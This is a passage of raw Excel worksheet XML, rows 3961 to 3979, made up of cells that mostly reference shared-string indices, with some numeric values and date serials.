      </c>
      <c r="I3961" s="12" t="s">
        <v>27</v>
      </c>
      <c r="J3961" s="12" t="s">
        <v>1314</v>
      </c>
      <c r="K3961" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3961" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3961" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3961" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3961" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3961" s="12" t="s">
        <v>24008</v>
      </c>
      <c r="Q3961" s="12">
        <v>3.1</v>
      </c>
      <c r="R3961" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3961" s="12" t="s">
        <v>25490</v>
      </c>
      <c r="T3961" s="12" t="s">
        <v>24573</v>
      </c>
      <c r="U3961" s="12" t="s">
        <v>25491</v>
      </c>
      <c r="V3961" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W3961" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3961" s="12">
        <v>10</v>
      </c>
      <c r="Y3961" s="12" t="s">
        <v>25492</v>
      </c>
    </row>
    <row r="3962" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3962" s="12">
        <v>42607</v>
      </c>
      <c r="B3962" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3962" s="12" t="s">
        <v>30442</v>
      </c>
      <c r="E3962" s="12" t="s">
        <v>31432</v>
      </c>
      <c r="F3962" s="12" t="s">
        <v>30443</v>
      </c>
      <c r="G3962" s="12" t="s">
        <v>25493</v>
      </c>
      <c r="H3962" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3962" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J3962" s="12" t="s">
        <v>1724</v>
      </c>
      <c r="K3962" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3962" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3962" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3962" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3962" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3962" s="12">
        <v>3.2</v>
      </c>
      <c r="Q3962" s="12">
        <v>3.2</v>
      </c>
      <c r="R3962" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3962" s="12" t="s">
        <v>25494</v>
      </c>
      <c r="T3962" s="12" t="s">
        <v>25495</v>
      </c>
      <c r="U3962" s="12" t="s">
        <v>25491</v>
      </c>
      <c r="V3962" s="12" t="s">
        <v>11875</v>
      </c>
      <c r="W3962" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3962" s="12">
        <v>1</v>
      </c>
      <c r="Y3962" s="12" t="s">
        <v>25496</v>
      </c>
    </row>
    <row r="3963" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3963" s="12">
        <v>42621</v>
      </c>
      <c r="B3963" s="12" t="s">
        <v>31338</v>
      </c>
      <c r="D3963" s="12" t="s">
        <v>31366</v>
      </c>
      <c r="E3963" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F3963" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G3963" s="12" t="s">
        <v>25497</v>
      </c>
      <c r="H3963" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3963" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J3963" s="12" t="s">
        <v>9315</v>
      </c>
      <c r="K3963" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3963" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3963" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3963" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3963" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3963" s="12" t="s">
        <v>25498</v>
      </c>
      <c r="Q3963" s="12">
        <v>3.1</v>
      </c>
      <c r="R3963" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3963" s="12" t="s">
        <v>25499</v>
      </c>
      <c r="T3963" s="12" t="s">
        <v>25213</v>
      </c>
      <c r="U3963" s="12" t="s">
        <v>25500</v>
      </c>
      <c r="V3963" s="12" t="s">
        <v>24558</v>
      </c>
      <c r="W3963" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3963" s="12">
        <v>3</v>
      </c>
      <c r="Y3963" s="12" t="s">
        <v>25501</v>
      </c>
    </row>
    <row r="3964" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3964" s="12">
        <v>42637</v>
      </c>
      <c r="B3964" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3964" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E3964" s="12" t="s">
        <v>31446</v>
      </c>
      <c r="F3964" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3964" s="12" t="s">
        <v>25502</v>
      </c>
      <c r="H3964" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3964" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3964" s="12" t="s">
        <v>422</v>
      </c>
      <c r="K3964" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3964" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M3964" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N3964" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O3964" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3964" s="12" t="s">
        <v>25503</v>
      </c>
      <c r="Q3964" s="12">
        <v>3.2</v>
      </c>
      <c r="R3964" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3964" s="12" t="s">
        <v>25504</v>
      </c>
      <c r="T3964" s="12" t="s">
        <v>4240</v>
      </c>
      <c r="U3964" s="12" t="s">
        <v>25491</v>
      </c>
      <c r="V3964" s="12" t="s">
        <v>2476</v>
      </c>
      <c r="W3964" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3964" s="12">
        <v>17</v>
      </c>
      <c r="Y3964" s="12" t="s">
        <v>25505</v>
      </c>
    </row>
    <row r="3965" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3965" s="12">
        <v>42649</v>
      </c>
      <c r="B3965" s="12" t="s">
        <v>30899</v>
      </c>
      <c r="D3965" s="12" t="s">
        <v>30900</v>
      </c>
      <c r="E3965" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F3965" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3965" s="12" t="s">
        <v>25506</v>
      </c>
      <c r="H3965" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3965" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3965" s="12" t="s">
        <v>96</v>
      </c>
      <c r="K3965" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3965" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3965" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3965" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3965" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3965" s="12" t="s">
        <v>25507</v>
      </c>
      <c r="Q3965" s="12">
        <v>3.3</v>
      </c>
      <c r="R3965" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3965" s="12" t="s">
        <v>25508</v>
      </c>
      <c r="T3965" s="12" t="s">
        <v>8568</v>
      </c>
      <c r="U3965" s="12" t="s">
        <v>25509</v>
      </c>
      <c r="V3965" s="12" t="s">
        <v>3902</v>
      </c>
      <c r="W3965" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3965" s="12">
        <v>7</v>
      </c>
      <c r="Y3965" s="12" t="s">
        <v>25510</v>
      </c>
    </row>
    <row r="3966" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3966" s="12">
        <v>42656</v>
      </c>
      <c r="B3966" s="12" t="s">
        <v>30452</v>
      </c>
      <c r="D3966" s="12" t="s">
        <v>30499</v>
      </c>
      <c r="E3966" s="12" t="s">
        <v>31446</v>
      </c>
      <c r="F3966" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3966" s="12" t="s">
        <v>25511</v>
      </c>
      <c r="H3966" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3966" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3966" s="12" t="s">
        <v>422</v>
      </c>
      <c r="K3966" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3966" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3966" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3966" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3966" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="Q3966" s="12">
        <v>3.2</v>
      </c>
      <c r="R3966" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3966" s="12" t="s">
        <v>25512</v>
      </c>
      <c r="T3966" s="12" t="s">
        <v>25513</v>
      </c>
      <c r="U3966" s="12" t="s">
        <v>25514</v>
      </c>
      <c r="V3966" s="12" t="s">
        <v>2476</v>
      </c>
      <c r="W3966" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3966" s="12">
        <v>5</v>
      </c>
      <c r="Y3966" s="12" t="s">
        <v>25515</v>
      </c>
    </row>
    <row r="3967" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3967" s="12">
        <v>42670</v>
      </c>
      <c r="B3967" s="12" t="s">
        <v>30501</v>
      </c>
      <c r="D3967" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F3967" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3967" s="12" t="s">
        <v>25520</v>
      </c>
      <c r="H3967" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3967" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J3967" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K3967" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3967" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3967" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3967" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3967" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3967" s="12" t="s">
        <v>25507</v>
      </c>
      <c r="Q3967" s="12">
        <v>3.3</v>
      </c>
      <c r="R3967" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3967" s="12" t="s">
        <v>25521</v>
      </c>
      <c r="T3967" s="12" t="s">
        <v>21778</v>
      </c>
      <c r="U3967" s="12" t="s">
        <v>25522</v>
      </c>
      <c r="V3967" s="12" t="s">
        <v>3527</v>
      </c>
      <c r="W3967" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3967" s="12">
        <v>2</v>
      </c>
      <c r="Y3967" s="12" t="s">
        <v>25523</v>
      </c>
    </row>
    <row r="3968" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3968" s="12">
        <v>42677</v>
      </c>
      <c r="B3968" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3968" s="18" t="s">
        <v>28349</v>
      </c>
      <c r="E3968" s="18" t="s">
        <v>31426</v>
      </c>
      <c r="F3968" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G3968" s="12" t="s">
        <v>25524</v>
      </c>
      <c r="H3968" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3968" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3968" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K3968" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3968" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3968" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3968" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3968" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3968" s="12" t="s">
        <v>25507</v>
      </c>
      <c r="Q3968" s="12">
        <v>3.3</v>
      </c>
      <c r="R3968" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3968" s="12" t="s">
        <v>25525</v>
      </c>
      <c r="T3968" s="12" t="s">
        <v>8287</v>
      </c>
      <c r="U3968" s="12" t="s">
        <v>25514</v>
      </c>
      <c r="V3968" s="12" t="s">
        <v>2034</v>
      </c>
      <c r="W3968" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3968" s="12">
        <v>1</v>
      </c>
      <c r="Y3968" s="12" t="s">
        <v>25526</v>
      </c>
    </row>
    <row r="3969" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3969" s="12">
        <v>42683</v>
      </c>
      <c r="B3969" s="12" t="s">
        <v>30193</v>
      </c>
      <c r="D3969" s="12" t="s">
        <v>30194</v>
      </c>
      <c r="E3969" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F3969" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3969" s="12" t="s">
        <v>25527</v>
      </c>
      <c r="H3969" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3969" s="12" t="s">
        <v>14196</v>
      </c>
      <c r="J3969" s="12" t="s">
        <v>15582</v>
      </c>
      <c r="K3969" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3969" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3969" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3969" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3969" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3969" s="12" t="s">
        <v>25507</v>
      </c>
      <c r="Q3969" s="12">
        <v>3.3</v>
      </c>
      <c r="R3969" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3969" s="12" t="s">
        <v>25528</v>
      </c>
      <c r="T3969" s="12" t="s">
        <v>21778</v>
      </c>
      <c r="U3969" s="12" t="s">
        <v>25529</v>
      </c>
      <c r="V3969" s="12" t="s">
        <v>15585</v>
      </c>
      <c r="W3969" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3969" s="12">
        <v>1</v>
      </c>
      <c r="Y3969" s="12" t="s">
        <v>25530</v>
      </c>
    </row>
    <row r="3970" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3970" s="12">
        <v>42685</v>
      </c>
      <c r="B3970" s="12" t="s">
        <v>31027</v>
      </c>
      <c r="D3970" s="12" t="s">
        <v>31032</v>
      </c>
      <c r="F3970" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3970" s="12" t="s">
        <v>25531</v>
      </c>
      <c r="H3970" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3970" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3970" s="12" t="s">
        <v>96</v>
      </c>
      <c r="K3970" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3970" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3970" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3970" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3970" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3970" s="12">
        <v>3.2</v>
      </c>
      <c r="Q3970" s="12">
        <v>3.2</v>
      </c>
      <c r="R3970" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3970" s="12" t="s">
        <v>25532</v>
      </c>
      <c r="T3970" s="12" t="s">
        <v>21778</v>
      </c>
      <c r="U3970" s="12" t="s">
        <v>25533</v>
      </c>
      <c r="V3970" s="12" t="s">
        <v>3902</v>
      </c>
      <c r="W3970" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3970" s="12">
        <v>10</v>
      </c>
      <c r="Y3970" s="12" t="s">
        <v>25534</v>
      </c>
    </row>
    <row r="3971" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3971" s="12">
        <v>42691</v>
      </c>
      <c r="B3971" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C3971" s="12" t="s">
        <v>28414</v>
      </c>
      <c r="D3971" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F3971" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G3971" s="12" t="s">
        <v>25535</v>
      </c>
      <c r="H3971" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3971" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J3971" s="12" t="s">
        <v>6599</v>
      </c>
      <c r="K3971" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3971" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M3971" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N3971" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O3971" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3971" s="12" t="s">
        <v>25536</v>
      </c>
      <c r="Q3971" s="12">
        <v>3.2</v>
      </c>
      <c r="R3971" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3971" s="12" t="s">
        <v>25537</v>
      </c>
      <c r="T3971" s="12" t="s">
        <v>25538</v>
      </c>
      <c r="U3971" s="12" t="s">
        <v>25539</v>
      </c>
      <c r="V3971" s="12" t="s">
        <v>4689</v>
      </c>
      <c r="W3971" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3971" s="12">
        <v>19</v>
      </c>
      <c r="Y3971" s="12" t="s">
        <v>25540</v>
      </c>
    </row>
    <row r="3972" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3972" s="12">
        <v>42696</v>
      </c>
      <c r="B3972" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3972" s="12" t="s">
        <v>30442</v>
      </c>
      <c r="E3972" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F3972" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G3972" s="12" t="s">
        <v>25541</v>
      </c>
      <c r="H3972" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3972" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J3972" s="12" t="s">
        <v>3110</v>
      </c>
      <c r="K3972" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3972" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3972" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3972" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3972" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3972" s="12" t="s">
        <v>25542</v>
      </c>
      <c r="Q3972" s="12">
        <v>3.3</v>
      </c>
      <c r="R3972" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3972" s="12" t="s">
        <v>25543</v>
      </c>
      <c r="T3972" s="12" t="s">
        <v>25544</v>
      </c>
      <c r="U3972" s="12" t="s">
        <v>25545</v>
      </c>
      <c r="V3972" s="12" t="s">
        <v>16927</v>
      </c>
      <c r="W3972" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3972" s="12">
        <v>30</v>
      </c>
      <c r="Y3972" s="12" t="s">
        <v>25546</v>
      </c>
    </row>
    <row r="3973" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3973" s="12">
        <v>42700</v>
      </c>
      <c r="B3973" s="12" t="s">
        <v>31338</v>
      </c>
      <c r="D3973" s="12" t="s">
        <v>31366</v>
      </c>
      <c r="E3973" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F3973" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3973" s="12" t="s">
        <v>25547</v>
      </c>
      <c r="H3973" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3973" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J3973" s="12" t="s">
        <v>744</v>
      </c>
      <c r="K3973" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L3973" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3973" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3973" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3973" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3973" s="12" t="s">
        <v>25548</v>
      </c>
      <c r="Q3973" s="12">
        <v>3</v>
      </c>
      <c r="R3973" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3973" s="12" t="s">
        <v>25549</v>
      </c>
      <c r="T3973" s="12" t="s">
        <v>25550</v>
      </c>
      <c r="U3973" s="12" t="s">
        <v>25551</v>
      </c>
      <c r="V3973" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W3973" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3973" s="12">
        <v>17</v>
      </c>
      <c r="Y3973" s="12" t="s">
        <v>25552</v>
      </c>
    </row>
    <row r="3974" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3974" s="12">
        <v>42707</v>
      </c>
      <c r="B3974" s="12" t="s">
        <v>30114</v>
      </c>
      <c r="C3974" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D3974" s="12" t="s">
        <v>30115</v>
      </c>
      <c r="E3974" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F3974" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3974" s="12" t="s">
        <v>25553</v>
      </c>
      <c r="H3974" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3974" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3974" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K3974" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3974" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3974" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3974" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3974" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3974" s="12" t="s">
        <v>25507</v>
      </c>
      <c r="Q3974" s="12">
        <v>3.3</v>
      </c>
      <c r="R3974" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3974" s="12" t="s">
        <v>25554</v>
      </c>
      <c r="T3974" s="12" t="s">
        <v>21778</v>
      </c>
      <c r="U3974" s="12" t="s">
        <v>25555</v>
      </c>
      <c r="V3974" s="12" t="s">
        <v>10538</v>
      </c>
      <c r="W3974" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3974" s="12">
        <v>2</v>
      </c>
      <c r="Y3974" s="12" t="s">
        <v>25556</v>
      </c>
    </row>
    <row r="3975" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3975" s="12">
        <v>42728</v>
      </c>
      <c r="B3975" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3975" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E3975" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F3975" s="12" t="s">
        <v>30351</v>
      </c>
      <c r="G3975" s="12" t="s">
        <v>25557</v>
      </c>
      <c r="H3975" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3975" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J3975" s="12" t="s">
        <v>1203</v>
      </c>
      <c r="K3975" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3975" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3975" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3975" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3975" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="Q3975" s="12">
        <v>3.3</v>
      </c>
      <c r="R3975" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3975" s="12" t="s">
        <v>25558</v>
      </c>
      <c r="T3975" s="12" t="s">
        <v>4822</v>
      </c>
      <c r="U3975" s="12" t="s">
        <v>25559</v>
      </c>
      <c r="V3975" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="W3975" s="12">
        <v>43064</v>
      </c>
      <c r="X3975" s="12">
        <v>81</v>
      </c>
      <c r="Y3975" s="12" t="s">
        <v>25560</v>
      </c>
    </row>
    <row r="3976" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3976" s="12">
        <v>42730</v>
      </c>
      <c r="B3976" s="12" t="s">
        <v>31325</v>
      </c>
      <c r="C3976" s="12" t="s">
        <v>31379</v>
      </c>
      <c r="D3976" s="12" t="s">
        <v>31366</v>
      </c>
      <c r="E3976" s="12" t="s">
        <v>31548</v>
      </c>
      <c r="F3976" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3976" s="12" t="s">
        <v>25561</v>
      </c>
      <c r="H3976" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3976" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J3976" s="12" t="s">
        <v>6599</v>
      </c>
      <c r="K3976" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3976" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3976" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3976" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3976" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3976" s="12" t="s">
        <v>25562</v>
      </c>
      <c r="Q3976" s="12">
        <v>3.2</v>
      </c>
      <c r="R3976" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3976" s="12" t="s">
        <v>25563</v>
      </c>
      <c r="T3976" s="12" t="s">
        <v>25564</v>
      </c>
      <c r="U3976" s="12" t="s">
        <v>25565</v>
      </c>
      <c r="V3976" s="12" t="s">
        <v>4689</v>
      </c>
      <c r="W3976" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3976" s="12">
        <v>70</v>
      </c>
      <c r="Y3976" s="12" t="s">
        <v>25566</v>
      </c>
    </row>
    <row r="3977" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3977" s="12">
        <v>42733</v>
      </c>
      <c r="B3977" s="12" t="s">
        <v>30116</v>
      </c>
      <c r="D3977" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F3977" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3977" s="12" t="s">
        <v>25567</v>
      </c>
      <c r="H3977" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3977" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J3977" s="12" t="s">
        <v>3068</v>
      </c>
      <c r="K3977" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3977" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3977" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3977" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3977" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3977" s="12" t="s">
        <v>25507</v>
      </c>
      <c r="Q3977" s="12">
        <v>3.3</v>
      </c>
      <c r="R3977" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3977" s="12" t="s">
        <v>25568</v>
      </c>
      <c r="T3977" s="12" t="s">
        <v>21778</v>
      </c>
      <c r="U3977" s="12" t="s">
        <v>25569</v>
      </c>
      <c r="V3977" s="12" t="s">
        <v>70</v>
      </c>
      <c r="W3977" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3977" s="12">
        <v>3</v>
      </c>
      <c r="Y3977" s="12" t="s">
        <v>25570</v>
      </c>
    </row>
    <row r="3978" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3978" s="12">
        <v>42734</v>
      </c>
      <c r="B3978" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3978" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F3978" s="12" t="s">
        <v>30155</v>
      </c>
      <c r="G3978" s="12" t="s">
        <v>25571</v>
      </c>
      <c r="H3978" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3978" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3978" s="12" t="s">
        <v>18372</v>
      </c>
      <c r="K3978" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3978" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3978" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3978" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3978" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3978" s="12" t="s">
        <v>25507</v>
      </c>
      <c r="Q3978" s="12">
        <v>3.3</v>
      </c>
      <c r="R3978" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3978" s="12" t="s">
        <v>25572</v>
      </c>
      <c r="T3978" s="12" t="s">
        <v>21778</v>
      </c>
      <c r="U3978" s="12" t="s">
        <v>25573</v>
      </c>
      <c r="V3978" s="12" t="s">
        <v>8133</v>
      </c>
      <c r="W3978" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3978" s="12">
        <v>17</v>
      </c>
      <c r="Y3978" s="12" t="s">
        <v>25574</v>
      </c>
    </row>
    <row r="3979" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3979" s="12">
        <v>42735</v>
      </c>
      <c r="B3979" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3979" s="12" t="s">
        <v>30442</v>
      </c>
      <c r="E3979" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F3979" s="12" t="s">
        <v>30443</v>
      </c>
      <c r="G3979" s="12" t="s">
        <v>25575</v>
      </c>
      <c r="H3979" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3979" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J3979" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K3979" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3979" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3979" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3979" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3979" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3979" s="12" t="s">
        <v>25576</v>
      </c>
      <c r="Q3979" s="12">
        <v>3.3</v>
      </c>
